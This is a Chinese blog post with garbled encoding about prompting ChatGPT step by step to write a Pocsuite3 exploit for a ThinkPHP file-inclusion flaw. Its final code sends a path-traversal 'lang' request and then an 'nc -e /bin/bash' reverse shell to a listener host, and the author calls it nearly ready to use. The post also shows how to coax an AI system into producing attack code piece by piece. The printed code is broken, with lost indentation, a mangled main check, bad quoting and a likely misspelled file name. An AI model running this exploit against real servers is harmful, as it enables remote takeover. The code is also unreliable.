通過ChatGPT來快速編寫Pocsuite3

前言

這一模型可以與人類進(jìn)行談話般的交互，可以回答追問，連續(xù)性的問題，承認(rèn)其回答中的錯誤，指出人類提問時的不正確前提，拒絕回答不適當(dāng)?shù)膯栴}。

簡單來說，ChatGPT是一個AI，能夠分析我們題出的問題，并且對此做出解答?？梢酝ㄟ^ChatGPT來分析代碼，或者讓其根據(jù)我們的需求寫出相應(yīng)的代碼，如下。

所以，我就在想，能不能讓它給我們編寫poc，簡化平時的一個工作，于是便有了這篇文章。

分析

發(fā)現(xiàn)

我發(fā)現(xiàn)，ChatGPT緩存了當(dāng)此詢問的結(jié)果，當(dāng)我們前后兩個問題相似的時候，ChatGPT會去分析兩個問題的一個相似度，如果相似度過高，則會返回上一次分析的結(jié)果。而且對于有歧義的語句，其處理結(jié)果誤差比較大，所以我們可以一開始給出一個簡單的語句，然后通過逐步的訓(xùn)練，讓其結(jié)果更加符合我們的預(yù)期。

過程

原理

在一開始，最好向CG(ChatGPT的簡稱)提供漏洞的相關(guān)原理，但是由我們直接去敘述，其準(zhǔn)確性比較低，因為語言存在歧義，那么，我們可以通過引導(dǎo)的方式，去讓CG了解和漏洞有關(guān)的信息，比如ThinkPHP最新的漏洞原理是因為多語言模式的開啟導(dǎo)致的文件包含，如果我們直接詢問。

我們會發(fā)現(xiàn)，CG無法為我們解析出來，因為其實在這里lang_switch_on是config.php返回數(shù)組中的一個鍵名，準(zhǔn)確來說并不是參數(shù)，所以這里解析才會出錯。我們知道config.php會返回一個數(shù)組，但是CG因為并不會去解析config.php,所以在它并不覺得config.php會返回什么。

但是我們換一種方法，我們詢問，

我們會發(fā)現(xiàn)，CG給出了我們一個流程，那么在這里，CG就記住了這一答案，當(dāng)我們在漏洞原理中加入了這句話，那么CG就能正確解析。

分段

當(dāng)我們直接通過一大段話讓其給我們編寫程序的時候，你會發(fā)現(xiàn)會有很多錯誤，如下。

根據(jù)我上面的發(fā)現(xiàn)，我突然想 ，我們可以先給出一個簡單的需求，在后面不斷基于之前給的答案，增加其準(zhǔn)確度就行。如下。

首先，詢問是否知道pocsuite，并要求給出一個例子。

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class TestPOC(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'Test POC'
    appPowerLink = 'https://example.com'
    appName = 'Test'
    appVersion = '1.0'
    vulType = 'Test Vul'
    desc = '''Test POC Description'''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        # your code here
        result = {}
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        # your code here
        return output


def main():
    register_poc(TestPOC)


if __name__ == '__main__':
    main()

接著，添加對漏洞的描述，要求其改進(jìn)。

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase


class ThinkPHP5_File_Inclusion(POCBase):
    vulID = '12345'
    version = '1.0'
    author = 'test'
    vulDate = '2022-01-01'
    createDate = '2022-01-01'
    updateDate = '2022-01-01'
    references = ['https://example.com/vul/12345']
    name = 'ThinkPHP5 File Inclusion Vulnerability'
    appPowerLink = 'https://thinkphp.cn'
    appName = 'ThinkPHP'
    appVersion = '5.0'
    vulType = 'File Inclusion'
    desc = '''
    This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
    To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
    and a malicious lang parameter must be passed in the URL.
    '''
    samples = ['']

    def _attack(self):
        # your code here
        pass

    def _verify(self):
        result = {}
        # your code here
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)

這時候，我們再添加一些信息。

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands.
'''
samples = ['']

def _attack(self):
    # your code here
    pass

def _verify(self):
    result = {}
    # your code here
    # send a request with a malicious lang parameter
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = url

    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('The vulnerability could not be verified')
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

最后，我們再補充一點。

import pocsuite3
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class ThinkPHP5_File_Inclusion(POCBase):
vulID = '12345'
version = '1.0'
author = 'test'
vulDate = '2022-12-09'
createDate = '2022-12-09'
updateDate = '2022-12-09'
references = ['https://tttang.com/archive/1865/']
name = 'ThinkPHP5 File Inclusion Vulnerability'
appPowerLink = 'https://thinkphp.cn'
appName = 'ThinkPHP'
appVersion = '5.0'
vulType = 'File Inclusion'
desc = '''
This POC checks for a file inclusion vulnerability in ThinkPHP 5.0.
To exploit this vulnerability, the LANG_SWITCH_ON value in the config.php file must be set to true,
and a malicious lang parameter must be passed in the URL. This can allow an attacker to include the
phearcmd.php file and execute arbitrary commands, including a reverse shell.
'''
samples = ['']

def _attack(self):
    # your code here
    # send a request with a malicious lang parameter to include phearcmd.php
    url = self.url + '?lang=../phearcmd.php'
    r = req.get(url)

    # check if the phearcmd.php file was included
    if 'PhearCommand execution' in r.text:
        # send a request to execute a reverse shell command
        command = 'php -r "system('nc -e /bin/bash {0} {1}');"'.format(self.options.get('lhost'), self.options.get('lport'))
        url = self.url + '?phearcmd=' + command
        req.get(url)

def _verify(self):
    result = {}
    # your code here
    return self.parse_output(result)

def parse_output(self, result):
    output = Output(self)
    # no output is necessary for this POC
    return output

def main():
register_poc(ThinkPHP5_File_Inclusion)

if name == 'main':
main()

到這里，基本上就可以拿來改改就能直接使用了。

結(jié)論

通過以上的利用和分析，我們能感受到CG的一個強(qiáng)大，當(dāng)CG對于我們的一個問題的解決結(jié)果誤差較大的時候，我們可以逐步進(jìn)行求解，讓其引擎對結(jié)果進(jìn)行不斷的修正，這樣最終的結(jié)果誤差較小。以上只是一個簡單的案例，還有更多的可能等待挖掘。

審核編輯：湯梓紅